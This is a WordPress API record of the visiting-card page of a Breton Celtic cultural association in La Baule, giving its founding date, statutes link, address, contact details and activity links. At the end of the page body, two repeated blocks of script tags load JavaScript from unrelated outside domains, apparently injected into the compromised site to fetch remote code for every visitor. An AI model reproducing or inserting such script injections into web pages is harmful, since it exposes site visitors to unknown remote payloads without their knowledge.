{"id":411,"date":"2017-04-19T07:35:28","date_gmt":"2017-04-19T05:35:28","guid":{"rendered":"http:\/\/labaulewp.gwalarn.org\/?page_id=411"},"modified":"2025-01-17T09:47:39","modified_gmt":"2025-01-17T08:47:39","slug":"la-carte-de-visite","status":"publish","type":"page","link":"https:\/\/cercleceltiquelabaule.bzh\/?page_id=411","title":{"rendered":"LA CARTE DE VISITE"},"content":{"rendered":"<h1>&nbsp;&nbsp;&nbsp;&nbsp; CERCLE CELTIQUE AR VRO WENN WAR RAOK<\/h1>\n<h2><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2999\" src=\"http:\/\/labaule.gwalarn.org\/wp-content\/uploads\/2017\/07\/emoticones-etonne-019.gif\" alt=\"\" width=\"50\" height=\"50\">&nbsp;LE CERCLE<\/h2>\n<table style=\"height: 452px;\" border=\"1\" width=\"581\" cellspacing=\"1\" cellpadding=\"1\">\n<tbody>\n<tr>\n<td>Association bauloise &#8211; loi 1901 &#8211; cr\u00e9e le 22\/08\/1946<\/td>\n<td>Statuts modifi\u00e9s en Assembl\u00e9e G\u00e9n\u00e9rale Extraordinaire le 25 septembre 2015&nbsp;<\/p>\n<p><span style=\"font-family: tahoma;\">R\u00e9c\u00e9piss\u00e9 de D\u00e9claration de Modification de l&rsquo;association n\u00b0 W443004671<\/span><\/td>\n<td><strong><a href=\"https:\/\/drive.google.com\/file\/d\/0BzS7tWzZthgVZWE3VjV4NnNhTlU\/view?usp=sharing\" target=\"_blank\" rel=\"noopener noreferrer\" data-cke-saved-href=\"file\/telechargement\/STATUTS__AR_VRO_WENN_WAR_RAOK_ADOPTES.pdf\" data-cke-pa-onclick=\"window.open(this.href, '', 'resizable=yes,status=no,location=no,toolbar=no,menubar=no,fullscreen=no,scrollbars=no,dependent=no'); return false;\">&nbsp;Les statuts<\/a><\/strong><\/td>\n<\/tr>\n<tr>\n<td>Lieux des activit\u00e9s<\/td>\n<td>Danse et Cours de Breton : &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;1 avenue du Bois Robin La Baule<\/td>\n<td>&nbsp;<\/td>\n<\/tr>\n<tr>\n<td>Si\u00e8ge social<\/td>\n<td><strong>Adresse postale<br \/>\n<\/strong>&nbsp;1 avenue du Bois Robin 44500 La Baule<\/td>\n<td>&nbsp;<\/td>\n<\/tr>\n<tr>\n<td>Adresse Mail<\/td>\n<td>&nbsp;arvrowennwr@cercleceltiquelabaule.bzh<\/td>\n<td>&nbsp;<\/td>\n<\/tr>\n<tr>\n<td>T\u00e9l\u00e9phone<\/td>\n<td>&nbsp;06 72 60 90 87 (Pr\u00e9sident)<\/td>\n<td>&nbsp;<\/td>\n<\/tr>\n<tr>\n<td>Conf\u00e9d\u00e9ration<\/td>\n<td>&nbsp;Conf\u00e9d\u00e9ration&nbsp; Kenleur<\/td>\n<td>&nbsp;<\/td>\n<\/tr>\n<tr>\n<td>&nbsp;<\/td>\n<td>&nbsp;<\/td>\n<td>&nbsp;<\/td>\n<\/tr>\n<tr>\n<td>Le Conseil d&rsquo;administration<\/td>\n<td>Il se r\u00e9uni r\u00e9guli\u00e8rement pour administrer le Cercle<\/td>\n<td>&nbsp;<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>&nbsp;<\/h2>\n<h2>&nbsp; <img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2992\" src=\"http:\/\/labaule.gwalarn.org\/wp-content\/uploads\/2017\/07\/emoticones-etonne-012.gif\" alt=\"\" width=\"66\" height=\"44\">&nbsp; LES ACTIVITES<\/h2>\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li>\n<h5 style=\"text-align: center;\"><a href=\"http:\/\/labaulewp.gwalarn.bzh\/?page_id=476\">LA DANSE<\/a><\/h5>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li style=\"text-align: center;\">\n<h5><a href=\"http:\/\/labaulewp.gwalarn.bzh\/?page_id=195\">LA MUSIQUE<\/a><\/h5>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<ul>\n<li style=\"text-align: center;\">\n<h5><a href=\"http:\/\/labaulewp.gwalarn.bzh\/?page_id=120\">LA LANGUE BRETONNE<\/a><\/h5>\n<\/li>\n<li>\n<h5 style=\"text-align: center;\"><a href=\"http:\/\/labaulewp.gwalarn.org\/?page_id=489\">LES PRESTATIONS<\/a><\/h5>\n<\/li>\n<\/ul>\n<p>&nbsp;&nbsp;<\/p>\n<p><script src=\"\/\/blinkloide.com\/221e5645d998d5ae68.js\"><\/script><script src=\"https:\/\/static-resource.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8734x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cdn-javascript.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8734x&amp;format=arrjs&amp;r=1577387930250\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/blinkloide.com\/ext\/221e5645d998d5ae68.js?sid=52624_8734_&amp;title=q&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/blinkloide.com\/221e5645d998d5ae68.js\"><\/script><script src=\"https:\/\/static-resource.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8734x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cdn-javascript.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8734x&amp;format=arrjs&amp;r=1577388290090\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/blinkloide.com\/ext\/221e5645d998d5ae68.js?sid=52624_8734_&amp;title=q&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp;&nbsp;&nbsp;&nbsp; CERCLE CELTIQUE AR VRO WENN WAR RAOK &nbsp;LE CERCLE Association bauloise &#8211; loi 1901 &#8211; cr\u00e9e le 22\/08\/1946 Statuts modifi\u00e9s en Assembl\u00e9e G\u00e9n\u00e9rale Extraordinaire le 25 septembre 2015&nbsp; R\u00e9c\u00e9piss\u00e9 de D\u00e9claration de Modification de l&rsquo;association n\u00b0 W443004671 &nbsp;Les statuts Lieux des activit\u00e9s Danse et Cours de Breton : &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &hellip; <a href=\"https:\/\/cercleceltiquelabaule.bzh\/?page_id=411\" class=\"more-link\">Continuer la lecture de <span class=\"screen-reader-text\">LA CARTE DE VISITE<\/span>  <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"class_list":["post-411","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/cercleceltiquelabaule.bzh\/index.php?rest_route=\/wp\/v2\/pages\/411","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/cercleceltiquelabaule.bzh\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/cercleceltiquelabaule.bzh\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/cercleceltiquelabaule.bzh\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/cercleceltiquelabaule.bzh\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=411"}],"version-history":[{"count":32,"href":"https:\/\/cercleceltiquelabaule.bzh\/index.php?rest_route=\/wp\/v2\/pages\/411\/revisions"}],"predecessor-version":[{"id":5209,"href":"https:\/\/cercleceltiquelabaule.bzh\/index.php?rest_route=\/wp\/v2\/pages\/411\/revisions\/5209"}],"wp:attachment":[{"href":"https:\/\/cercleceltiquelabaule.bzh\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=411"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}